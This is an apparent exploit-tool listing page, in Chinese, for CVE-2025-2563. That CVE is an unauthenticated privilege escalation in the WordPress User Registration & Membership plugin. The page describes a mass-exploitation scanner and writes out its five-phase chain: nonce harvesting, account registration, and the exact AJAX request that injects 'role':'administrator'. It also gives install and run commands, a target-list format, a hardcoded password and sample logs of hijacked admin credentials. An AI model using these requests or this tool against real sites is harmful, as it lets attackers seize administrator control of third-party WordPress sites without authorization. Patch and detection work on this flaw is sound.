Skip to content
KitploitKITPLOIT
工具博客
Log in
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-2563 — WordPress 插件 User Registration & Membership 在 4.1.2 之前版本中,当 Membership Addon 启用时,未能阻止用户设置其账户角色,导致权限提升问题,并允许未认证用户获得管理员权限。 | Kitploit
工具/GitHubGitHub/nxploited/cve-2025-2563
权限提升漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育红队Payload 开发
GitHubnxploited/cve-2025-2563

CVE-2025-2563

WordPress 插件 User Registration & Membership 在 4.1.2 之前版本中,当 Membership Addon 启用时,未能阻止用户设置其账户角色,导致权限提升问题,并允许未认证用户获得管理员权限。

查看仓库
175个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-2563

WordPress 插件 User Registration & Membership 在 4.1.2 之前的版本中,当 Membership Addon 启用时,未能阻止用户设置其账户角色,从而导致权限提升问题,并允许未经身份验证的用户获取管理员权限。

Typing SVG


🔴 漏洞概述

CVE-2025-2563 — 通过 Membership Addon 角色注入实现未认证权限提升

字段详情
CVE 编号CVE-2025-2563
严重性高危 — CVSS v3.1 评分:8.1
攻击向量CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
ADPCISA-ADP
受影响软件WordPress 的 User Registration & Membership 插件
受影响版本4.1.2 之前的所有版本
漏洞类型权限管理不当 — 未认证管理员账户创建
所需认证无
CWECWE-269:权限管理不当

描述:
WordPress 的 User Registration & Membership 插件在 4.1.2 之前的版本中,当 Membership Addon 启用时,未能强制执行服务端角色限制。在会员注册过程中,该插件在 user_registration_membership_register_member AJAX 操作中接受用户提供的 role 字段,且未与服务端白名单进行校验。完全未经身份验证的远程攻击者可以提交一条精心构造的两步 AJAX 链——首先通过 user_registration_user_form_submit 注册一个新用户账户,然后在会员调用的 members_data 载荷中注入 "role": "administrator"——从而静默创建一个拥有完全权限的 WordPress 管理员账户。这将导致站点被完全攻陷,且无需任何身份验证或用户交互。


🛠️ 工具描述

这是一个概念验证(PoC)批量漏洞利用扫描器,针对运行存在漏洞版本的 User Registration & Membership 插件且启用了 Membership Addon 的 WordPress 站点。该工具执行智能的多阶段漏洞利用,包括自动发现、nonce 收集、基于组合的注册、角色注入和管理员验证。

🔗 完整攻击链

[Phase 1 — Discovery]
  GET /membership-pricing/        →  Extract membership_id, pricing links
  GET /membership-registration/   →  Extract form_id, nonces, security tokens
  GET /registration/              →  Fallback registration page

          ↓

[Phase 2 — Nonce Extraction]
  Parse: ur_membership_frontend_localized_data._nonce
  Parse: ur_frontend_form_nonce, security, form_id, membership_id

          ↓

[Phase 3 — Registration (Combo Attack)]
  POST /wp-admin/admin-ajax.php
  action=user_registration_user_form_submit
  form_data=[{user_login, user_email, user_pass, membership_field, ...}]
  security=<token>  |  ur_frontend_form_nonce=<nonce>
  → Try all valid combos until success=true

          ↓

[Phase 4 — Role Injection (CVE-2025-2563)]
  POST /wp-admin/admin-ajax.php
  action=user_registration_membership_register_member
  members_data={"role":"administrator","membership":"<id>",...}
  _wpnonce=<membership_js_nonce>
  → Server assigns administrator role to newly created user

          ↓

[Phase 5 — Admin Verification]
  POST /wp-login.php              →  Login with new credentials
  GET  /wp-admin/                 →  Check adminmenu / wp-admin-bar
  GET  /wp-admin/users.php        →  Confirm manage_options access
  GET  /wp-admin/plugin-install.php →  Confirm plugin-install access

          ↓

[Save to Nx_admin.txt]
  Format: [timestamp] https://target.com/wp-login.php user:<u> pass:<p>

📋 环境要求

系统要求

  • Python 3.8 或更高版本
  • Linux / Windows / macOS

Python 依赖

pip install requests urllib3 rich

或通过 requirements 文件:

pip install -r requirements.txt

requirements.txt:

requests>=2.28.0
urllib3>=1.26.0
rich>=13.0.0

🚀 安装

# Clone the repository
git clone https://github.com/Nxploited/CVE-2025-2563.git
cd CVE-2025-2563

# Install dependencies
pip install -r requirements.txt

# Run the tool
python3 CVE-2025-2563.py

⚙️ 使用方法

基本运行

python3 CVE-2025-2563.py

该工具使用由 Rich 驱动的完全交互式终端界面。


🗂️ 目标列表格式

创建一个纯文本文件(默认:list.txt)——每行一个目标:

https://target1.com
https://target2.com
http://target3.com
target4.com

没有 http:// 或 https:// 前缀的目标会自动添加 https:// 前缀。


🖥️ 交互式提示

Targets file [list.txt]:                    list.txt
Threads [3]:                                5
HTTP timeout (seconds) [10]:                10
Max registration attempts per target [20]:  20

密码在内部固定为 Nx_adminSA,用于所有注册尝试。


🔬 漏洞利用深入解析

第 1 步 — 多页面发现

该工具自动对每个目标探测三个页面:

页面用途
/membership-pricing/提取 membership_id 和注册链接
/membership-registration/提取表单令牌、nonce 和字段 ID
/membership-registration/?membership_id=<id>针对特定套餐的表单提取
/registration/备用通用注册页面

第 2 步 — 令牌提取

以下令牌从原始 HTML 和内联 JavaScript 中提取:

令牌来源
_nonceur_membership_frontend_localized_data JS 对象
ur_frontend_form_nonce隐藏输入字段或 JS 对象
securityuser_registration_params.user_registration_form_data_save
form_id隐藏输入 ur-user-form-id 或 JS 对象
membership_id单选输入 urm_membership 或 URL 查询字符串

第 3 步 — 注册 AJAX(组合攻击)

POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

action=user_registration_user_form_submit
&security=<token>
&form_data=[{"field_name":"user_login","value":"Nxploited_482",...},
            {"field_name":"membership_field_1771350090","value":"<mid>","field_type":"radio"}]
&form_id=<id>
&ur_frontend_form_nonce=<nonce>
&is_membership_active=<mid>
&membership_type=<mid>

该工具会自动遍历所有已发现的 security、frontend_nonce、form_id 和 membership_id 组合,直到收到 success: true 响应。


第 4 步 — 角色注入 AJAX(漏洞调用)

POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

action=user_registration_membership_register_member
&_wpnonce=<membership_js_nonce>
&members_data={"membership":"<id>","payment_method":"free",
               "role":"administrator","username":"Nxploited_482",...}
&form_response={"username":"Nxploited_482","registration_type":"membership"}

⚠️ 服务器在没有任何白名单校验的情况下接受 role 字段——这是 CVE-2025-2563 的根本原因。


📁 输出文件

文件描述
reg.txt所有成功的注册尝试及其凭据
Nx_admin.txt所有已确认的管理员权限提升

✅ 输出格式

reg.txt:

[2025-06-01 12:44:10] https://target.com/wp-login.php user:Nxploited_482 email:[email protected] pass:Nx_adminSA

Nx_admin.txt:

[2025-06-01 12:44:18] https://target.com/wp-login.php user:Nxploited_482 pass:Nx_adminSA

🖥️ 终端输出示例

╔══════════════════════════════════════════════════════════════════╗
║  User Registration Membership Full Chain                         ║
║  By: Nxploited  |  GitHub: github.com/Nxploited  |  @Kxploit    ║
╚══════════════════════════════════════════════════════════════════╝

[SCANNING]      https://target.com
[EXPLOITING]    https://target.com  |  nonce + reg OK
[EXPLOITED]     https://target.com  |  password: Nx_adminSA
下载工具